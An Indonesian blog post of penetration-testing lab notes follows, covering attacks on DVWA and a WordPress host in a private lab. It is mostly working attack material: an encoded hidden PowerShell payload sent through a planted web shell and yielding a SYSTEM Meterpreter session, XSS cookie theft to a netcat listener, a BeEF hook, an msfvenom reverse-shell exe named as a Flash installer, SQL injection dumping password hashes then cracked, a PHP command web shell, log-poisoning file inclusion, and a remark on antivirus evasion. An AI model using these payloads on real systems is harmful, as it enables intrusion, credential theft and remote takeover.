QAEYAVABiAGsASQBVAGYANQA2AGEAQgBXACsAMgBDAG8ASABXAC8AbgAwAEkAawBpAHgAZQBUAGIATwA5AHMAYgBWAHQASABCAHkATgB2ADkAZgBJAFQAdgBXAHEAZwA5AC8AegByADkAQwA5AG4AWAB0AEoANwB1AC8AQgBHAE0AeAB2AHcALwA0AHUAOQBWAHYARgAzADQATAAwAGQAKwBOAGYASQBTAHAAQQBFAEUATABXAGcAMABqAGgANwB2AHUAQgB3AEEAYwA2AGYASABpAFgAYwBBAEcAWAB6AGYAdQA4AFUAbABmADQAMgA0AFQAYwBkAEcARgBGADQAUwB6ADAANwA4AEIAZQBJAGYAeQArAHkAdwBLAEEAQQBBAD0AJwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA     


copy mulai dari powershell.exe sampai akhir paste di backdoor


buka di browser :

http://192.168.56.105/wordpress/aa?cmd=powershell.exe%20-nop%20-w%20hidden%20-e%20aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBDADUANQBLADEAOABDAEEANwBWAFcAKwAyACsAYgBTAEIARAArAE8AWgBIAHkAUAA2AEQASwBFAHEAQQA0AHgAcwBSAHUAawAwAGEAcQBkAEkAdgBmAHIAbgBIAHMARQBMAC8AaQBXAHEAYwBOAEwATABEAE8AdwB0AHEAdwArAE4AWAByAC8AMwA2AEQAYgBkAEwAMABtAHYAYgBhAGsAdwA3ADUAcwBZACsAWgAyAFoAbAB2AHYAcABuAEYAVABVAEoAYgBVAEIANQBLADQAcgBvAGoAZgBUADQANwBQAGUAbgBoAEMAQQBlAFMAawBuAFAAKwA3AE8AYQBsAEgASwBtAHAASgB5AGUAdwBtAGcAdQBHADAAZwBkAEoAbQBhAEwARgBvAHMAbwBEAFQATQBQAFoAegBVADAAbABpAFMASQBTAGkAcwBPADgAMABDAEEAQwB4AFQARQBKAEgAaABrAGwAcwBhAEoASwBmADAAawBqAG4AMABUAGsANAB2AFoAeABUAG0AdwBoAGYAWgBaAHkAZgB4AFkAYQBqAEQAOQBpAGQAaABUAGIAVgByAEQAdABFACsAawBDAGgAVQA2ADYAMQArAEUAMgBUAGgAMABwAFcAQQB0AEcAaABTAEoALwArAGkAUwByADAAdwB0ADkAVgBxAGcAdABFADgAeABpAFIAYgBhADIAcwBTAEIAQgB3AFcARgBNAFYAcQBVAHYAYQBuAHIAZwAvAFgAWgBCAEYATgBtAGsAZABzAFIAagA3AG8AcgBDAGkASQBhAGwAeQA4AEkAZwBqAEwARgBMAHUAbQBCAHQAUgBVAHcAaQBmAE8ANwBFAHMAZwBvAHgAdwBDAGMAaQBJAG8AbABDAEMAYQBKAEoAMQBRACsAYgBpAGcAegBEAFgAcwBSAHQANQBEAGcAUgBpAFcATQA1AEwAMAAxAFQAdwA5AFAAWgA3AEEAOQBsAGUAagB6ADEATABnAGsARgBEAFUAaQBoAEYAUQBvAFMAOABZAFYARgBvAGgAVwAxAFMAVgB4AG8ANAB0AEIAaAA1AEkANgA0AE0AOQBDAHkAUgBFAFIARABiADYAYQBxAEkATABiAGkAVAAwAFQASgBoAFEAbABqAGUAZQBsADMAegBDAGgAZABzAHMANAB3ACsAMQBVAGwANQBhAFUAUwBTAFAAVgBFAHAATwBZAGgAaABkADkARgBhAFgASQBuAFkAZQBTAGcASgA3AC8AaQBaAHAAcAAwAEYAWgA1AEQANABnAEcAegBMADIAZQBuAFoANgBkAHUAUgBoAEYAdQBYAHYAdgA2AFMANQBMAEEANgBHAFMANgBIAHgATgB3AFQAZQBuAHgAbQBPADQARgBQADAAagBGAHYARwBUAEMATQBWAGoAdwBhAEEAdgBUADMASAAyAFUARQBIAFgAMgBEAEsAeQBVAFkAMgAvAG4AZQB2ADcASAArAG4AbwBtAEQASwBKAHoASABSAGEAbQBRADAANgBkAEcAUwBnAGMATQA1AG4AYgBrAG4AZQBwADQARQA4AFkAVwBTAFUAdQBEAFUAbAAxAEcAKwBLAEEAMgBoAG4AcABsAE4AYwBBAEoAaQA0AGoAKwB4AEEATABtAFYAZwBYAFgARgBMAGsANAB3AFoAeABxAG8AUQBSAEQANABzAFUAdABEAFQAUAAzADYAbgBWAEEAaQBxAGUAZABZADIARQBNAG8AZABFAHkASQBZAGsAeABlAEEAVgA1AEUALwA5ADEAcABsAEQASABoAFMANQBGAFoAbwBrAEEASQBRAE8AYwB5AEIAZQB6AGcAVwBxAGsAMAB6ADYAUwBPADkAdABkAG4AbwA2AEIAeQBHADUAdwBuAEEAYwA1ADYAVgBlAEEAcgBWAG0ANQB5AFcATABZAEUAYQBjAHYASQBUAEMAbQBCADYAMwBVAEMATAA0AGYAaQBoAC8AZABkAGQATQBtAEsAQQAyAGoAawBWAG0AYgBxAFoAbQBPAEIANwBQAHEALwBBAHcARgBsAEYAaQBRADkASQBnADkAbgB0AHIAUQBXAHkASwBXAFEAcABGAFgAbQBwAFMAaAB4AGgAYgBpADMAcgBaAHUAZgBLAHIAUQBGAFEAdwBZADEAQQBEAFkARwBrAEYAaQBZAEMAVgBGAEEAQgBMAHAARgBTAEkAdwBNAFYAOQAyAHQAVwBDAFIAVQBRAHIAVwBEAEEAUwBnAE0AeQArADYATwBzAE0AZQAxAEQAaQBSADYAYgB2AHUAWQBNADkANABzAGoALwA5AEQARABqADgAbwBHADQASwBSAFkAWgBDAEMALwA4AGcAdwBSAGIAagBJAHUAOABOAEsAUwBSAGcATgA2AFIANABnAHAAawArADAAKwBIAHYAKwBnAFoAZQB6AGMAcQBFAFQAawBtAFEAcwBuAEsAWQAyAHAAcwBSAGMAcgBwADMATwBPAGsAVwA2AHEAbgBsAEQAegBDAHMAZwBjAGgARQBnAEIAQQBQAGUASwBCAGcAVwBQAHkAcgBuAHgAbwBFAGMAbwBiADcAWgBaAFcARQBEAHkAVABWAHMAaABNADIAMwBpAGkATwBsAHAAVAB2AFcAWABDAGQAMABCAEwATABWADYAOQBjAGoANgAyADUAMAAwAHQAcQBtADUAOABGADcAWABpAGwAdABuAHMAVgBmAHYATgBaAG4AbgBWAHQAbwBaAGwAWQBkAFYAYQA0AG0ATwB2AEoAYwB6AGEAZQBEADYAMwBVAFAATgB1AE0AQgBFAFAATABkAFMAOABwADgAVwBuAFMAWABtADMAYQBOAE8AZAAxAFUASABPAFoASwBPADkAMgB4AG0ANwBkAGQASABZADcATwBhAGUANAAwADYAcQByAHUAdABkAHUAZABhAGQALwByAFoATwBPADYATgBLADMAeQBoAGUANABrADYAMQBsAG4AUgBHAHgAdABvAG8AbAB1AE0AYQBYAFQAZgA3AGQATgBCAC8AYQB0AGYARgA0ADIAVABJADgATQBEAFYAdgBMAEgAKwBIAHQATgBOAEoANQBvAFAAZABXADcAdQBXAGcAZwAxAC8ASgBLADkAYQA3AHYARABoAG0AOAA2ADIAMABtAFQAawByAGwAVwA3AE4AQQArADYAaQBQADAAMABiADQAYgBEAEIAcgBlAHcAbQB2AEUAUwBIAHMALwBYAEYAYQBDAE8AVgBwAFcAdgBSAHAARwBMAGQAUQBvAGIAdAB0AHYAbQBkAEUAZgAxAEEAMAAwAHEAQgBsADkAZgBNAHQANwBwAGYATwBxAHAAagA4ADQAeQAxAHIAOQBZAFkAegBiAEEAWABNAGEAVABVADIAZgBqAEoARwBEAEkAdQAzAGUAOAAvAFcAcgBXAHoAOQBNAGMAYwBLAGUAcwBUAFIAUwBHAGQAUgA1ADIATgBZADEAawBPAG0AVgBVAGIATgA4AFMAWABjAFAAeQAzADcARABRAHoAVwBRAEcAUQBZAGMANABUAHAAOQBHAHAAeQBQAHcAVwBiADMASABuAFIARwBBADkAMwBoAFMASQBTAHQAcwBhAFkATgBQAGMAMQBEAHIAdQBWAFAATQBEAEoAQQAyAGwAaQBpAHUAcwBFAHIAMgArAHUAZQAyAGQATwBHAHcAMAB0AGYAZgAzAHoAUwBmAGYAQwBaAGoARgBmAFgAWgBoAHUAZAAxACsAMgBlAHAAbQBuAG4AdwBTAFAAOABhAHMAZwAyAEYANQB0AHcAYgBLAHkAdgBWAG0AdQBCADIAeQBPAHcAZgBhACsAOQBIADMAeAA0AGsANQBJAEUAVwBKAEkATABpAHYATQBYAHEAZgA5AFIAeQB6AFoAeABGAFAAdQBZAEEAUwBXAGcARwAyAGQAMQBXAE8AZABSAC8AZABoAGkAZQA1AHkAbQBHAG8AcQBTADMAcwBaAFAASgBBAG8ASgBnAHcAcwBOAHIAcgB5AE0AeQA0AGcAeABiAHEAZgBOAC8AZABDAEwANABXAFkANQA5AFAAdgAwACsAaABuAEEAcwBIAFQANQA2AGsAaQBWAG4AZwBYAFYAcgAzADAALwBXADcAcQA1AGUAUQBBAHYAbwBVAEQAMgBEAEMANQAwAFMATwBnAEoAUAAxAC8AYwBsAEkAcABGADYATwBQAEYAVABiAGsASQBVAGYANQA2AGEAQgBXACsAMgBDAG8ASABXAC8AbgAwAEkAawBpAHgAZQBUAGIATwA5AHMAYgBWAHQASABCAHkATgB2ADkAZgBJAFQAdgBXAHEAZwA5AC8AegByADkAQwA5AG4AWAB0AEoANwB1AC8AQgBHAE0AeAB2AHcALwA0AHUAOQBWAHYARgAzADQATAAwAGQAKwBOAGYASQBTAHAAQQBFAEUATABXAGcAMABqAGgANwB2AHUAQgB3AEEAYwA2AGYASABpAFgAYwBBAEcAWAB6AGYAdQA4AFUAbABmADQAMgA0AFQAYwBkAEcARgBGADQAUwB6ADAANwA4AEIAZQBJAGYAeQArAHkAdwBLAEEAQQBBAD0AJwAnACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA


masuk metasploitnya

msf5 > sessions


Active sessions

===============


  Id  Name  Type                     Information                        Connection

  --  ----  ----                     -----------                        ----------

  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ KEUANGAN-PC  192.168.56.4:6988 -> 192.168.56.105:53925 (192.168.56.105)


msf5 > sessions 1

[*] Starting interaction with 1...


meterpreter > sysinfo

Computer        : KEUANGAN-PC

OS              : Windows 7 (6.1 Build 7601, Service Pack 1).

Architecture    : x64

System Language : id_ID

Domain          : MEGACORP

Logged On Users : 3

Meterpreter     : x86/windows

meterpreter > 



 #### XSS

 cross site scripting

 ##### XSS Reflected

 

 1. Memunculkan popup

 

 pada sebuah kolom input, masukkan 

 <script>alert("XSS")</script> 

 

 kalau muncul popup berarti terdapat ada celah xss

 

 2. Redirect : 

 <script>alert(document.cookie);</script>

 3. Mencuri Cookie 

 

 pada sebuah kolom input, masukkan 

 <script>alert(document.cookie);</script>

 

 $ nc -lnvp 8080

 

 masukkan di kolom input

 

 <script>document.location="http://192.168.56.4:8080/steal?cookie=" + document.cookie</script>

 

 di nc akan muncul :

 

 connect to [192.168.56.4] from (UNKNOWN) [192.168.56.4] 53426

GET /steal?cookie=security=low;%20PHPSESSID=ffad61013553290517fa82bb9ae63be1 HTTP/1.1

Host: 192.168.56.4:8080

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.56.120/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Edocument.location%3D%22http%3A%2F%2F192.168.56.4%3A8080%2Fsteal%3Fcookie%3D%22+%2B+document.cookie%3C%2Fscript%3E

Connection: keep-alive

Upgrade-Insecure-Requests: 1


buka incognito

masuk ke web http://192.168.56.4/dvwa/login.php

inspect element, masukkan PHPSESSID=ffad61013553290517fa82bb9ae63be1 dan security=low pada properties

reload halaman

buka : http://192.168.56.120/dvwa/vulnerabilities/xss_r/


##### XSS Stored



1. Memunculkan popup

 

 pada sebuah kolom input, masukkan 

 <script>alert("XSS")</script> 

 

 root@kali:/home/kali# beef-xss

 << masukkan password Anjay123! >>

 

 buka web : 127.0.0.1:3000/ui/login

 login dengan user beef password Anjay123!

 

 pada kolom stored xss masukkan 

 

 <script src="http://192.168.56.4:3000/hook.js"></script>

 

 muncul online browsers

 

 $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.4 LPORT=8081 -f exe -o adobe_flash.exe

 

 $ python -m SimpleHTTPServer 8082

 $ nc -lnvp 8081

 

 

 ##### Query SQL Injection

 

 ' or 1=1 #

 ' order by 2#

 ' union select null, @@version#

 ' union select table_schema, table_name from information_Schema.tables#

 ' union select null, concat(table_schema, ";" , table_name, ";'", column_name) FROM information_schema.columns#

 ' union select user, password from dvwa.users#

 ' union select null, concat(user, ":" , password)#

 

 copy hasil query terakhir dan masukkan ke file

 

 formatnya:

 

 smithy:5f4dcc3b5aa765d61d8327deb882cf99

 

 nano dvwa-hash

 

 usr/sbin/john --format=RAW-MD5 dvwa-hash

 

Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist                                                                     

password         (admin)                                                                                                                  

password         (smithy)

abc123           (gordonb)

letmein          (pablo)

Proceeding with incremental:ASCII

charley          (1337)



##### Vulnerability upload file


1. Buat file backdoor.php


<?php

system($_GET['cmd']);

?>


2. Tes upload file backdoor.php


3. Open file yg di upload di web ditambahin ?cmd=whoami

http://192.168.56.120/dvwa/hackable/uploads/backdoor.php?cmd=whoami


##### File Inclusion


misal pada link web :


http://192.168.56.120/dvwa/vulnerabilities/fi/?page=include.php


ganti jadi 


http://192.168.56.120/dvwa/vulnerabilities/fi/?page=/etc/passwd


kalau berubah coba ekseksi :


http://192.168.56.120/dvwa/vulnerabilities/fi/?page=/var/log/auth.log


lakukan ssh command dengan username backdoor


ssh '<?php system($_GET['cmd']); ?>'@192.168.56.120 dengan password asal


kalau muncul warning : Warning: system() [function.system]: Cannot execute a blank command in


itu bisa


jalankan http://192.168.56.120/dvwa/vulnerabilities/fi/?page=/var/log/auth.log&cmd=more /etc/passwd


kalau commandnya berhasil, kita sudah dapat shell



##### Metode bypass antivirus salah satunya dengan membuat backdoor dengan format powershell

loading...
Labels:

Comments

Post a Comment

Popular posts from this blog

Merepresentasikan Algoritma dengan Flowchart dan Pseudocode

  Merepresentasikan Algoritma dengan Flowchart Flowchart adalah jenis diagram (grafis tau simbolik) yang mewakili suatu algoritma atau proses-proses tertentu. Setiap langkah dalam algoritma diwakili oleh simbol yang sama atau berbeda dan berisi penjelasan singkat setiap langkah. Flowchart merepresentasikan algoritma dalam bentuk desain, simbol dan dijadikan dokumentasi dan kemudian dituangkan menjadi kode-kode program. Sebelum membuat flowchart, kita harus memahami unsur flowchart sebagai berikut : Input Percabangan ( biasanya menggunakan perintah if dan switch) Perulangan ( biasanya menggunakan perintah atau kode while, for, loop, each ) Output Flowchart biasanya digambar menggunakan beberapa simbol standar, namun tidak menutup opsi lain untuk menyertakan simbol-simbol di luar standar untuk digunakan jika memang diperlukan simbol tersebut di desain yang kita buat. Berikut ini simbol – simbol yang biasa digunakan dalam flowchart. Simbol simbol diatas adalah simbol dasar yang diguna...
Post a Comment
Read more

Contoh Soal Data dalam Sistem Bahasa Pemrograman R

  Tuliskan pernyataan R untuk membuat deret bilangan berikut : x = [-5 -4 -3 -2 -1 0 1 2 3] y = [5 4 3 2 1] z = [1000000 1166667 1333333 1500000 1666667 1833333 2000000] p = [9 9 9 5 5 5] q = [1 1 1 2 2 2 1 1 1 2 2 2] Jawaban : > x <- seq (from=-5,to=3,length=9) > x [1] -5 -4 -3 -2 -1 0 1 2 3 > y <- seq (from=5,to=1,length=5) > y [1] 5 4 3 2 1 > z <- seq (from=1000000,to=2000000,length=7) > z [1] 1000000 1166667 1333333 1500000 1666667 1833333 2000000 > p <- rep(c(9,5),each=3) > p [1] 9 9 9 5 5 5 > q <- rep(c(1,2,1,2),each=3) > q [1] 1 1 1 2 2 2 1 1 1 2 2 2 Tuliskan pernyataan R untuk membuat frame data siswa berikut : No Jurusan asal_daerah usia 1 Komputer Bogor 25 2 Fisika Bogor 25 3 Komputer Bandung 25 4 Fisika Bandung 25 5 Komputer Bogor 26 6 Fisika Bogor 26 7 Komputer Bandung 26 8 Fisika Bandung 26 Jawaban : > jurusan <- c("Komputer","Fisika","Komputer","Fisika","Komputer...
1 comment
Read more

Lab 8.8 Konfigurasi Log Analyzer Visited Pages dengan Awstats di Apache pada Centos7

Assalamu’alaikum wr.wb Pada kali ini ane ingin share cara monitoring dengan awstats. Awstats adalah sebuah tools untuk memantau visited pages pada webserver. Langsung saja kita konfigurasi 1. Install epel, karena awstats ini tidak ada pada repository centos, tetapi ada pada epel. Caranya adalah seperti dibawah ini   2. Kemudian install awstats 3. Awstats ini secara default membuat konfigurasi sesuai dengan hostname. Jika tidak sesuai Antara hostname dan web yang akan dibuatkan halaman awstatsnya, maka rename konfigurasi yang ada sesuai hostname menjadi nama domain anda tanpa menghilangkan format yang ada. [root@ct-ali ~]# mv /etc/awstats/awstats.ct-ali.alisofyan.com.conf /etc/awstats/awstats.www.alisofyan.com.conf 4. Konfigurasi awstats untuk webserver yang telah diatur [root@ct-ali ~]# vi /etc/awstats/awstats.www.alisofyan.com.conf Sesuaikan konfigurasi seperti dibawah ini dengan keadaan anda  dan ...
Post a Comment
Read more
loading...